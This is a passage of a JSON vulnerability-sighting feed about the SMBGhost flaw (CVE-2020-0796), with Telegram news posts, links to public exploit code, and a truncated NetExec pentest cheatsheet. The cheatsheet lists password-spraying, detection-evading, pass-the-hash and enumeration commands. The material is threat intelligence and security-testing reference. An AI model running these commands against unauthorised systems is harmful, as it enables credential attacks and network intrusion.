"CVE-2020-0796", "type": "exploited", "source": "https://t.me/canyoupwnme/6346", "content": "CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost\nhttps://github.com/danigargu/CVE-2020-0796", "creation_timestamp": "2020-03-30T20:31:43.000000Z"}, {"uuid": "e17ac0da-b3dc-47e6-b78c-fde7c39a3aa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/SecLabNews/7084", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 SMBv3. CVE-2020-0796 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u00ab\u0447\u0435\u0440\u0432\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u043e\u0435\u00bb \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u043e\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c\u0441\u044f \u043e\u0442 \u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043a \u0434\u0440\u0443\u0433\u043e\u043c\u0443.    \nMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 SMBv3", "creation_timestamp": "2020-03-13T08:05:02.000000Z"}, {"uuid": "942d42aa-c61d-436e-b057-1af59a0f35ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/cibsecurity/10474", "content": "\ud83d\udd0f Microsoft Patches SMBv3 Bug \ud83d\udd0f\n\nMicrosoft issued an out-of-band security update for a critical SMB bug (CVE-2020-0796) on Thursday.\n\n\ud83d\udcd6 Read\n\nvia \"Subscriber Blog RSS Feed \".", "creation_timestamp": "2020-03-12T21:17:12.000000Z"}, {"uuid": "20a43b86-9d7f-4289-ac53-bdbe18e0cb00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/SecLabNews/7789", "content": "\u0410\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b (CISA) \u0421\u0428\u0410 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Windows \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u00ab\u0447\u0435\u0440\u0432\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u043e\u0439\u00bb \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Windows 10 (CVE-2020-0796) \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a.    \nCISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u043e \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 SMBGhost", "creation_timestamp": "2020-06-08T15:00:02.000000Z"}, {"uuid": "e6576557-fac3-4774-a96e-57242f8ab00d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/S_E_Reborn/4178", "content": "https://blog.projectdiscovery.io/nuclei-v3-featurefusion\n\n\u0412\u044b\u0448\u0435\u043b Nuclei v3!\n\n\u0412 \u043d\u043e\u0432\u043e\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0441\u043a\u0430\u043d\u0435\u0440\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438:\n\u2014 Code Protocol - \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432 \u0442\u0435\u043c\u043f\u043b\u0435\u0439\u0442\u0430\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u044b \u043d\u0430 Python, bash \u0438 Javascript. \u0422\u0435\u043f\u0435\u0440\u044c, \u043f\u043e\u043c\u0438\u043c\u043e \u0431\u0430\u0437\u043e\u0432\u044b\u0445 \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439 \u0434\u043b\u044f \u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043c\u043e\u0436\u043d\u043e \u043f\u0438\u0441\u0430\u0442\u044c \u0441\u043b\u043e\u0436\u043d\u0443\u044e \u043b\u043e\u0433\u0438\u043a\u0443 \u0434\u043b\u044f \u043f\u043e\u0441\u0442-\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0430 \u0435\u0449\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, sqlmap).\n\u2014 Template Signing & Verification - \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u0434\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0448\u0430\u0431\u043b\u043e\u043d\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ECDSA, \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0447\u0443\u0436\u0438\u0435. \u0411\u0430\u0437\u043e\u0432\u044b\u0435 nuclei-templates \u0443\u0436\u0435 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u044b \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 ProjectDiscovery.\n\u2014 Multi-Protocol Engine - \u0442\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u043f\u0438\u0441\u0430\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438, \u0441\u043e\u0441\u0442\u043e\u044f\u0449\u0438\u0435 \u0438\u0437 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0448\u0430\u0433\u043e\u0432, \u0438 \u0434\u043b\u044f \u0440\u0430\u0437\u043d\u044b\u0445 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0430\u0439\u0442\u0438 \u043d\u043e\u0432\u044b\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u044b, \u0430 \u043f\u043e\u0442\u043e\u043c \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c Subdomain Takeover.\n\n\u041f\u0440\u0438\u043c\u0435\u0440\u044b \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u043e\u0432\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439:\n\u2014 Fingerprint SSH Server (SSH Protocol)\n\u2014 CVE-2020-0796 (aka SMBGhost)\n\u2014 MS SQL Server Credential Stuffing\n\u2014 Redis Password Bruteforce\n\u2014 SSH Credential Stuffing\n\n\u0412 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0435\u043c \u0431\u0443\u0434\u0443\u0449\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u043f\u043b\u0430\u043d\u0438\u0440\u0443\u0435\u0442 \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c DSL v2 \u0438 \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u0442\u044c \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 \u0444\u0430\u0437\u0437\u0438\u043d\u0433\u0430 (\u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a, \u0442\u0435\u043b\u043e \u0438 \u043c\u043d\u043e\u0433\u043e\u0435 \u0434\u0440\u0443\u0433\u043e\u0435).", "creation_timestamp": "2023-10-25T10:43:32.000000Z"}, {"uuid": "defc8477-9453-4662-8e93-9a373805dd25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/2358", "content": "#Analytics\nTop-10 exploited vulnerabilities in July-December 2020:\n1. CVE-2020-0601 - CurveBall CryptoAPI\nhttps://t.me/cybersecuritytechnologies/628\n2. CVE-2019-17026/CVE-2020-0674 - 0-Day Vulnerability in Mozilla Firefox\nhttps://t.me/cybersecuritytechnologies/914\n3. CVE-2020-0796 - Windows SMBv3 LPE exploit\nhttps://t.me/cybersecuritytechnologies/874\n4. CVE-2020-1472 - Microsoft Zerologon\nhttps://t.me/cybersecuritytechnologies/1742\n5. CVE-2020-5902/5903 - F5 BigIP TMUI Critical RCE\nhttps://t.me/cybersecuritytechnologies/1378\n6. CVE-2018-10561 - Dasan GPON Router Auth. Bypass\nhttps://t.me/cybersecuritytechnologies/51\n7. CVE-2020-1350 - Exploit SIGRed\nhttps://t.me/cybersecuritytechnologies/1422\n8. CVE-2020-15999 + CVE-2020-17087 = Win Kernel cng.sys buffer overflow 0-Day\nhttps://t.me/cybersecuritytechnologies/1960\nhttps://t.me/cybersecuritytechnologies/2010\n9. CVE-2020-16898 - \"Bad Neighbor\" RCE Vulnerability\nhttps://t.me/cybersecuritytechnologies/1912\n10. CVE-2020-1938 - \"Ghostcat\" Apache Tomcat\nhttps://t.me/cybersecuritytechnologies/705", "creation_timestamp": "2025-01-04T20:00:34.000000Z"}, {"uuid": "e2bdbef7-c593-4fa4-b7e1-2f213fabc17b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8390", "content": "#exploit\n1. CVE-2023-29007:\nGit Arbitrary Configuration Injection\nhttps://blog.ethiack.com/en/blog/git-arbitrary-configuration-injection-cve-2023-29007\n\n2. CVE-2020-0796:\nWindows Protocol TestSuites is to trigger BSoD\nhttps://github.com/Ajomix/CVE-2020-0796", "creation_timestamp": "2024-03-19T03:31:34.000000Z"}, {"uuid": "c7df0294-04ad-4231-9450-fdd4253f99eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/SecLabNews/7405", "content": "\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Ricerca Security \u0441\u043e\u0437\u0434\u0430\u043b\u0438 \u043f\u0435\u0440\u0432\u044b\u0439 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u00ab\u0447\u0435\u0440\u0432\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u043e\u0439\u00bb \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Windows 10 (CVE-2020-0796), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434.\n\n\n\u041d\u043e\u0432\u044b\u0439 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f SMBGhost \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434", "creation_timestamp": "2020-04-21T08:00:02.000000Z"}, {"uuid": "6a33a4f7-b9bc-406a-9a9a-dd76258c4d56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/SecLabNews/7807", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 ZecOps \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2020-1206) \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 Microsoft Server Message Block (SMB). \u0415\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u044f\u0434\u0440\u0430 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0430 \u0432 \u0441\u043e\u0447\u0435\u0442\u0430\u043d\u0438\u0438 \u0441 \u0440\u0430\u043d\u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u00ab\u0447\u0435\u0440\u0432\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u043e\u0439\u00bb \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e SMBGhost \u0432 Windows 10 (CVE-2020-0796) \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.    \nSMBleed \u2014 \u043d\u043e\u0432\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 SMB-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435", "creation_timestamp": "2020-06-27T17:45:13.000000Z"}, {"uuid": "5598eeaf-0736-4ccc-b80d-cc06544ffbc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/SecLabNews/7248", "content": "\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 ZecOps \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SMBGhost (CVE-2020-0796) \u043c\u043e\u0436\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0438\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.    \n\u0414\u043b\u044f \u00ab\u0447\u0435\u0440\u0432\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u043e\u0439\u00bb \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Windows 10 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442", "creation_timestamp": "2020-04-01T16:00:21.000000Z"}, {"uuid": "849dcb95-1719-4899-bb0e-d3b642f6c461", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/BugCod3/215", "content": "CVE-2020-0796 Remote overflow POC\n\nCVE-2020\u20130796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol\n\nWhich devices does the CVE-2020-0796 affect?\n\n+ Windows 10 Version 1903 for 32-bit Systems\n\n+ Windows 10 Version 1903 for ARM64-based Systems\n\n+ Windows 10 Version 1903 for x64-based Systems\n\n+ Windows 10 Version 1909 for 32-bit Systems\n\n+ Windows 10 Version 1909 for ARM64-based Systems\n\n+ Windows 10 Version 1909 for x64-based Systems\n\n+ Windows Server, version 1903 (Server Core installation)\n\n+ Windows Server, version 1909 (Server Core installation)\n\n\nGitHub\nGitHub\n\n#CVE #Microsoft #POC\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\ud83d\udc64 T.me/MRvirusIRBOT\n\ud83d\udce2 T.me/BugCod3", "creation_timestamp": "2023-04-25T09:41:03.000000Z"}, {"uuid": "91031466-62d5-40d0-a738-5d55b4a9c339", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/789", "content": "#info\nMicrosoft Releases Patch for Windows SMBv3 Compression Vulnerability CVE-2020-0796\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796", "creation_timestamp": "2024-10-10T02:48:36.000000Z"}, {"uuid": "3f8cbb9d-4002-4fae-8546-decf1dbc810b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/777", "content": "#exploit\n1. CVE-2020-9380:\nIPTV Smarters Exploit\nhttps://github.com/migueltarga/CVE-2020-9380\n\n2. CVE-2020-0796:\nMicrosoft SMBv3 compression RCE\nhttps://kb.cert.org/vuls/id/872016/\n]-> Guide for Disabling SMBv3 Compression\n]-> Preventing SMB traffic from lateral connections and entering or leaving the network\n]-> Scan HOST/CIDR with nmap script", "creation_timestamp": "2024-10-17T16:41:05.000000Z"}, {"uuid": "4018df1f-418e-4d58-a88e-e4c6367a0653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/874", "content": "#exploit\nCVE-2020-0796:\nPublic LPE exploit for SMBv3 bug\nhttps://github.com/danigargu/CVE-2020-0796\n]-> Pre-Auth PoC: https://github.com/ZecOps/CVE-2020-0796-POC", "creation_timestamp": "2023-08-31T19:19:51.000000Z"}, {"uuid": "a93648ea-d36a-4cb2-9b41-6a35442e6a71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/cibsecurity/10441", "content": "\u274c Wormable, Unpatched Microsoft Bug Threatens Corporate LANs \u274c\n\nCVE-2020-0796 affects version 3.1.1 of Microsoft\u2019s SMB file-sharing system and was not included in Patch Tuesday.\n\n\ud83d\udcd6 Read\n\nvia \"Threatpost\".", "creation_timestamp": "2020-03-11T18:34:20.000000Z"}, {"uuid": "d991eb7d-52af-4076-966c-751f498fb868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/48e15610-a505-4067-8dec-4627e36bcbe7", "content": "", "creation_timestamp": "2026-05-07T22:16:31.000000Z"}, {"uuid": "9a2eaadd-b6c8-44b3-867b-c27ce5ebdf1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. Always check `nxc  --help` and `nxc  -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc   -u  -p  / -H  [flags] -M  -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10                    # Single host\nnxc smb 192.168.1.0/24                  # CIDR range\nnxc smb 192.168.1.1-100                 # Range\nnxc smb targets.txt                     # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' -d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10     # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3      # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5       # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt    # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H  -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey  -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24                              # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt  # Find relay targets\n```\n\n### Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares              # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write  # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\"            # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users               # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled     # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt  # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups              # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers           # Enumerate 